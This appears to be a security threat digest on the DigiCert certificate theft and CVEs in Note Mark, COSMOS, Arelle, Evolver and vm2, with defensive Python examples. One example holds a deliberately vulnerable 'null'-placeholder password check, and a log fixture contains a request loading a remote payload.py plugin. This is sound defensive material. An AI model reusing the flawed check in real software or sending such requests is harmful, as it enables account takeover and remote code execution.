
In the last 24 hours, 6 notable items were detected (6 critical, 0 high, 0 moderate). Top highlights: DigiCert Hacked via Weaponized Screensaver File to Obtain EV Code Signing Certificates · CVE-2026-41571: Note Mark is an open-source note-taking application. In version 0.19.2, IsPasswordMatch in backend/db/models.go falls back to a hard-coded bcrypt("null") placeholder whenever a user has no stored password. OIDC-registered users are created · CVE-2026-42088: OpenC3 COSMOS provides the functionality needed to send commands to and receive data from one or more embedded systems. Prior to version 7.0.0-rc3, the Script Runner widget allows users to execute Python and Ruby scripts directly from the o.
Top Highlights
A threat actor reportedly compromised DigiCert support staff with a weaponized screensaver file and used stolen EV code signing certificates to distribute Zhong Stealer malware.
Abused EV code signing certificates can undermine endpoint trust decisions and enable malware to evade reputation-based controls. Organizations should assume signed binaries are not inherently safe and validate certificate provenance, signer reputation, and behavioral telemetry.
- Hunt for Zhong Stealer indicators, suspicious signed binaries, and recently introduced executables signed with DigiCert EV code signing certificates.
- Review endpoint telemetry for execution of .scr files, ZIP attachments from support/chat workflows, and anomalous child processes from browsers, chat tools, or archive utilities.
- Increase scrutiny of newly observed signed binaries across Windows endpoints, especially those with low prevalence, unusual paths, or network connections to unknown infrastructure.
- Validate Okta, Google Workspace, Microsoft 365, GitLab, AWS, and Slack logs for credential theft indicators, suspicious sessions, MFA fatigue, token use, and impossible travel.
CVE-2026-41571 allows unauthenticated takeover of OIDC-created Note Mark users by logging in with the password value "null" in version 0.19.2.
Crypto organizations commonly rely on OIDC/SSO for internal tools; bypassing it can expose notes, operational procedures, secrets, incident records, or customer-sensitive data. If Note Mark is internet-accessible, exploitation could be rapid and low-noise.
- Upgrade Note Mark from version 0.19.2 to 0.19.3 or later immediately.
- Review Note Mark authentication logs for internal login attempts using password value "null" or unusual sessions for OIDC-created users.
- Invalidate active Note Mark sessions after patching and monitor for suspicious access to sensitive notes or assets.
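The mechanism behind this CVE is a generic one worth recognising in any code base: a password check that substitutes a valid placeholder hash when an account has no stored password, so that every SSO-created account silently accepts the placeholder's plaintext. The following Python example is added here to illustrate that pattern beside its hardened form; it is not Note Mark's code. PBKDF2 from the standard library stands in for bcrypt, the User record is a constructed stand-in for the real model, and the placeholder salt and sample accounts are constructed.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class User:
    """Minimal account record (constructed; not Note Mark's model).

    OIDC-registered users never set a local password, so password_hash stays None.
    """
    username: str
    password_hash: Optional[bytes] = None
    salt: bytes = field(default_factory=lambda: os.urandom(16))


def hash_password(password: str, salt: bytes) -> bytes:
    # PBKDF2-HMAC stands in for bcrypt so the example runs offline; the flaw
    # being shown lives in the fallback logic, not in the hash function.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


# Stand-in for the hard-coded bcrypt("null") placeholder the advisory describes:
# a perfectly valid hash of a publicly known string, with a fixed (assumed) salt.
PLACEHOLDER_SALT = b"placeholder-salt-assumed"
PLACEHOLDER_HASH = hash_password("null", PLACEHOLDER_SALT)


def is_password_match_vulnerable(user: User, candidate: str) -> bool:
    """Flawed pattern: fall back to the placeholder when no hash is stored."""
    if user.password_hash is None:
        # Every account without a local password now accepts the string "null".
        return hmac.compare_digest(PLACEHOLDER_HASH, hash_password(candidate, PLACEHOLDER_SALT))
    return hmac.compare_digest(user.password_hash, hash_password(candidate, user.salt))


def is_password_match_fixed(user: User, candidate: str) -> bool:
    """Hardened: an account with no local password can never match a password."""
    if user.password_hash is None:
        # Burn the same amount of work so response time does not reveal which
        # accounts are SSO-only, then refuse unconditionally.
        hash_password(candidate, PLACEHOLDER_SALT)
        return False
    return hmac.compare_digest(user.password_hash, hash_password(candidate, user.salt))


def create_local_user(username: str, password: str) -> User:
    """Account that did set a local password; both variants must still accept it."""
    salt = os.urandom(16)
    return User(username, hash_password(password, salt), salt)


if __name__ == "__main__":
    oidc_user = User("alice@example.test")  # constructed OIDC-created account
    print("vulnerable, password 'null':", is_password_match_vulnerable(oidc_user, "null"))
    print("fixed, password 'null':", is_password_match_fixed(oidc_user, "null"))
```

The hardened variant refuses password login outright for accounts without a local credential rather than comparing against anything; the dummy hash call keeps the timing of that refusal indistinguishable from a failed comparison.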
CVE-2026-42088 lets non-admin OpenC3 COSMOS script users bypass API permissions and perform administrative actions across shared Docker services.
Crypto organizations with embedded, hardware, or operational technology workflows could see secrets, logs, plugins, and system command configurations altered by a lower-privileged user. Administrative bypass in a command-and-control platform can create safety, integrity, and operational disruption risks.
- Upgrade OpenC3 COSMOS to version 7.0.0-rc3 or later immediately.
- Review Script Runner permissions and audit scripts run by non-admin users for direct Redis, bucket service, or internal container network access.
- Monitor COSMOS Redis, bucket service, configuration, plugin, and settings changes for unauthorized modifications or suspicious script-originated activity.
CVE-2026-42796 allows unauthenticated remote code execution in Arelle before 2.39.10 via malicious plugin URLs passed to /rest/configure.
Crypto organizations may use XBRL or reporting tooling for finance, audit, compliance, or regulatory workflows. Compromise of Arelle could expose financial data, credentials, reports, or provide a foothold into internal systems.
- Upgrade Arelle to version 2.39.10 or later immediately.
- Identify any exposed Arelle webserver instances and review /rest/configure access logs for plugins parameters referencing external URLs or unexpected Python files.
- Monitor Arelle hosts for new plugin files, unexpected outbound downloads, Python child activity, and suspicious process or network behavior.
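The log review recommended above can be scripted. The following Python example is added here as an illustration and is not part of the original digest or of Arelle: it walks combined-format web access log lines, keeps requests to /rest/configure, and flags any plugins entry that is a remote URL or a Python file outside an assumed trusted plugin directory. The log lines, the trusted directory, and the assumption that entries are separated by "|" and may carry a leading operator character are all constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Sequence
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in combined log format (not real traffic): two routine
# requests, then two that pass a remote URL and an out-of-tree .py file.
SAMPLE_LOG = """\
10.0.0.5 - - [01/May/2026:10:01:02 +0000] "GET /rest/configure?plugins=validate%2FEFM HTTP/1.1" 200 512
10.0.0.5 - - [01/May/2026:10:03:11 +0000] "GET /rest/xbrl/validation?file=report.xbrl HTTP/1.1" 200 2048
198.51.100.23 - - [01/May/2026:10:07:44 +0000] "GET /rest/configure?plugins=%2Bhttp%3A%2F%2F203.0.113.7%2Fpayload.py HTTP/1.1" 200 512
198.51.100.23 - - [01/May/2026:10:08:01 +0000] "GET /rest/configure?plugins=%2Ftmp%2Fdropped.py%7Cvalidate%2FEFM HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
URL_SCHEME_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.\-]*://")

# Assumed location of the deployment's own plugin tree; adjust per host.
TRUSTED_PLUGIN_PREFIXES = ("/opt/arelle/plugin/",)


@dataclass
class Finding:
    ip: str
    timestamp: str
    entry: str
    reason: str


def classify_plugin_entry(entry: str, trusted: Sequence[str] = TRUSTED_PLUGIN_PREFIXES) -> Optional[str]:
    """Return why one plugin entry is suspicious, or None if it looks routine."""
    # Assumption: an entry may carry a leading operator such as '+'; strip it first.
    name = entry.strip().lstrip("+~-")
    if URL_SCHEME_RE.match(name):
        return "plugin loaded from remote URL"
    if name.lower().endswith(".py") and not name.startswith(tuple(trusted)):
        return "Python file outside the trusted plugin directory"
    return None


def triage_configure_requests(log_text: str) -> List[Finding]:
    """Collect suspicious plugins entries from every /rest/configure request."""
    findings: List[Finding] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != "/rest/configure":
            continue
        # parse_qs percent-decodes values, so separators and URLs come back readable.
        for raw in parse_qs(parts.query).get("plugins", []):
            for entry in raw.split("|"):  # assumption: '|' separates plugin entries
                reason = classify_plugin_entry(entry)
                if reason:
                    findings.append(Finding(m.group("ip"), m.group("ts"), entry, reason))
    return findings


if __name__ == "__main__":
    for f in triage_configure_requests(SAMPLE_LOG):
        print(f"{f.timestamp} {f.ip} {f.reason}: {f.entry}")
```

Any hit is worth correlating with the host-side signals in the next bullet (new plugin files, outbound downloads, Python child processes), since a single request is enough to install a plugin.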
CVE-2026-42076 is a command injection vulnerability in Evolver before 1.69.3 that can allow arbitrary shell command execution via _extractLLM().
In a crypto environment, RCE in agent infrastructure can expose secrets, cloud credentials, source code, wallets, signing services, or internal systems. Agent runtimes often have broad integration access, making rapid inventory, patching, and compromise review important.
- Identify any Evolver deployments in agentic automation, servers, developer tooling, or CI/CD and check for versions before 1.69.3.
- Upgrade Evolver to version 1.69.3 or later to remediate command injection in _extractLLM().
- Review process, shell, EDR, and network telemetry for suspicious curl, execSync, shell metacharacter use, or unexpected child processes from Evolver runtimes.
CVE-2026-26956 is a full vm2 sandbox escape in version 3.10.4 that allows attacker code to execute arbitrary host commands.
Crypto organizations may use Node.js sandboxes in automation, plugin systems, CI/CD, bots, or agentic workflows, where host compromise could expose secrets, source code, signing material, cloud credentials, or production access. Any service executing untrusted JavaScript through vm2 3.10.4 should be treated as high-risk until patched and reviewed.
- Search codebases, lockfiles, containers, and runtime dependency inventories for vm2 version 3.10.4, especially services executing untrusted JavaScript.
- Upgrade vm2 to version 3.10.5 or later and redeploy affected Node.js services and containers.
- Review logs, EDR, process trees, and network telemetry for unexpected child processes, shell commands, or outbound connections from Node.js services using vm2.
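Searching lockfiles for a specific vm2 version, as the first bullet recommends, is easy to get wrong when the package is installed several times under nested node_modules paths. The following Python example is added here as an illustration (it is not part of the digest and not vm2's code): it walks a package-lock.json in either the lockfileVersion 2/3 "packages" layout or the older nested "dependencies" layout, reports every installed copy of a named package, and flags copies below a given fixed version. The lockfile contents are constructed; the package-to-fixed-version mapping is whatever the caller supplies, shown here with vm2 and 3.10.5 from the advisory.

```python
import json
from typing import Dict, Iterator, List, Tuple

# Constructed package-lock.json (lockfileVersion 3 layout); not from any real project.
# The top-level vm2 is the vulnerable release; a nested copy is already fixed.
SAMPLE_LOCK = json.dumps({
    "name": "sandbox-runner",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "sandbox-runner", "dependencies": {"vm2": "^3.10.0", "plugin-host": "1.2.0"}},
        "node_modules/vm2": {"version": "3.10.4"},
        "node_modules/plugin-host": {"version": "1.2.0"},
        "node_modules/plugin-host/node_modules/vm2": {"version": "3.10.5"},
    },
})

FIXED_VERSIONS = {"vm2": "3.10.5"}  # package name -> first release to accept


def parse_version(v: str) -> Tuple[int, ...]:
    """'3.10.4' -> (3, 10, 4); a '-rc1' or '+build' suffix is dropped for comparison."""
    core = v.lstrip("v").split("-", 1)[0].split("+", 1)[0]
    return tuple(int(p) for p in core.split("."))


def iter_installed(lock: Dict) -> Iterator[Tuple[str, str, str]]:
    """Yield (name, version, install path) for every installed package."""
    if "packages" in lock:  # lockfileVersion 2 or 3: flat map keyed by install path
        for path, meta in lock["packages"].items():
            if not path or "version" not in meta:  # "" is the root project itself
                continue
            name = path.rsplit("node_modules/", 1)[-1]  # keeps @scope/name intact
            yield name, meta["version"], path
    else:  # lockfileVersion 1: nested "dependencies" tree
        def walk(deps: Dict, prefix: str) -> Iterator[Tuple[str, str, str]]:
            for name, meta in deps.items():
                path = f"{prefix}node_modules/{name}"
                yield name, meta.get("version", ""), path
                yield from walk(meta.get("dependencies", {}), path + "/")
        yield from walk(lock.get("dependencies", {}), "")


def find_outdated(lock_text: str, fixed: Dict[str, str] = FIXED_VERSIONS) -> List[Tuple[str, str, str]]:
    """Return (path, name, version) for each installed copy older than its fixed version."""
    lock = json.loads(lock_text)
    hits = []
    for name, version, path in iter_installed(lock):
        if name in fixed and version and parse_version(version) < parse_version(fixed[name]):
            hits.append((path, name, version))
    return hits


if __name__ == "__main__":
    for path, name, version in find_outdated(SAMPLE_LOCK):
        print(f"{name} {version} at {path}: below {FIXED_VERSIONS[name]}, upgrade and redeploy")
```

Run it over every package-lock.json in the repositories and container images you inventory; a nested copy that a transitive dependency pinned is just as reachable as the top-level one, which is why the walk reports the install path and not only the package name.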